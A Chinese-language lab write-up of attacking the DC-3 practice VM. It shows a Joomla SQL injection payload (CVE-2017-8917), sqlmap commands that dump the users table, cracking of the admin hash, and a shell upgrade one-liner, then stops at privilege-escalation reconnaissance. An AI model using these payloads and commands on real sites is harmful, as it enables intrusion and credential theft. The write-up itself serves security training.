DC-3 渗透记录

信息收集

收集到靶机ip为：192.168.204.35
并只开放了80端口

访问页面，看到相应的提示，使用nmap全面扫描，得到服务器版本和linux版本

Flag 1:
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:DD:2E:E3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

使用web网站有joomla组件

查询发现joomla存在sql注入漏洞 CVE-2017-8917

进入页面http://192.168.204.35/index.php尝试

1	http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,database()),0x7e)

得到数据库名，证明存在sql注入

sql漏洞利用

这里可以使用sqlmap注入工具

得到数据库名

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent –dbs -p list[fullordering]

查询到表名

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent -D joomladb –tables

使用表名进行字段查询

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent -D joomladb -T “#__users” –columns

查询用户名和密码

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent -D joomladb -T “#__users” -C name,password,username,id –dump

1 2	得到用户名和加密的hash密码 admin \| $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

继续从hash入手，尝试破解用户admin的密码
使用 hash识别器，还是没有识别出

google之后，发现另外一个爆破工具john（作者本意也是让用这个）一种在服务器中查找用户弱密码的工具

得到密码 admin/snoopy ，使用刚刚爆破出的管理员后台进入后台

拿到管理员权限回到刚刚使用的msf漏洞现在可以使用它进行利用并shell反弹

生成交互shell

python -c”import pty;pty.spawn(‘/bin/bash’)”

尝试提权root 寻找具有suid的命令

尝试之后发现suid提权可能行不通，于是把目光放在操作系统漏洞上
Cat /etc/issue , 发现ubuntu版本16.04 版本较低

www-data@DC-3:/var/www/html/templates/beez3$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/beez3$